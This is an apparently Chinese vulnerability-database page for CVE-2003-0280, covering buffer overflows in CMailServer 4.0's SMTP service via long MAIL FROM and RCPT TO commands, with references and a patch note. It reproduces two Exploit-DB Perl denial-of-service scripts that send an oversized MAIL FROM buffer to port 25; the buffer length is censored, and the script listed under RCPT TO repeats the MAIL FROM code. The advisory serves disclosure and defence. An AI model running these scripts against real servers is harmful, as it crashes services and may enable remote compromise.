CVE-2003-0280
CVSS10.0
发布时间 :2003-06-16 00:00:00
修订时间 :2016-10-17 22:31:41
NMCOE    

[原文]Multiple buffer overflows in the SMTP Service for ESMTP CMailServer 4.0.2003.03.27 allow remote attackers to execute arbitrary code via long (1) MAIL FROM or (2) RCPT TO commands.


[CNNVD]Youngzsoft CMailServer MAIL FROM远程缓冲区溢出漏洞(CNNVD-200306-102)

        
        CMailServer是一款EMAIL服务程序,包含基于WEB的邮件服务系统。
        CMailServer的SMTP服务程序对邮件的"MAIL FROM"字段缺少正确缓冲区边界检查,远程攻击者可以利用这个漏洞对服务进行缓冲区溢出攻击,可能在系统上执行任意指令。
        CMailServer的SMTP服务在解析EMAIL头字段时存在问题,如果攻击者构建的邮件"MAIL FROM"字段超长,就会破坏内存,触发缓冲区溢出,精心构建提交数据可能在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0280
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0280
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-102
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0062.html
(UNKNOWN)  VULNWATCH  20030510 Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0
http://marc.info/?l=bugtraq&m=105258772101349&w=2
(UNKNOWN)  BUGTRAQ  20030510 Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0
http://www.securityfocus.com/bid/7547
(UNKNOWN)  BID  7547
http://www.securityfocus.com/bid/7548
(UNKNOWN)  BID  7548
http://xforce.iss.net/xforce/xfdb/11975
(UNKNOWN)  XF  cmailserver-smtp-bo(11975)

- 漏洞信息

Youngzsoft CMailServer MAIL FROM远程缓冲区溢出漏洞
危急 边界条件错误
2003-06-16 00:00:00 2005-10-20 00:00:00
远程  
        
        CMailServer是一款EMAIL服务程序,包含基于WEB的邮件服务系统。
        CMailServer的SMTP服务程序对邮件的"MAIL FROM"字段缺少正确缓冲区边界检查,远程攻击者可以利用这个漏洞对服务进行缓冲区溢出攻击,可能在系统上执行任意指令。
        CMailServer的SMTP服务在解析EMAIL头字段时存在问题,如果攻击者构建的邮件"MAIL FROM"字段超长,就会破坏内存,触发缓冲区溢出,精心构建提交数据可能在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        YoungZSoft
        ----------
        升级到ESMTP CMailServer 4.0.2003.03.30或之后版本:
        
        http://www.youngzsoft.com

- 漏洞信息 (22581)

Youngzsoft CMailServer 4.0 MAIL FROM Buffer Overflow Vulnerability (EDBID:22581)
windows dos
2003-05-10 Verified
0 Dennis Rand
N/A [点击下载]
source: http://www.securityfocus.com/bid/7547/info

A buffer overflow vulnerability has been reported for CMailServer. The vulnerability exists due to insufficient bounds checking when parsing e-mail headers. Specifically, an overly long MAIL FROM e-mail header will cause CMailServer to crash and corrupt sensitive memory. 

#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Ive censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;

$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; #


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
		

- 漏洞信息 (22582)

Youngzsoft CMailServer 4.0 RCPT TO Buffer Overflow Vulnerability (EDBID:22582)
windows dos
2003-05-10 Verified
0 Dennis Rand
N/A [点击下载]
source: http://www.securityfocus.com/bid/7548/info

A buffer overflow vulnerability has been reported for CMailServer. The vulnerability exists due to insufficient bounds checking when parsing e-mail headers. Specifically, an overly long RCPT TO e-mail header will cause CMailServer to crash and corrupt sensitive memory. 

#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Ive censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;

$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; #


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
		

- 漏洞信息

12075
YoungZSoft CMailServer Multiple Mail Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2003-05-10 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.0.2003.03.30 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站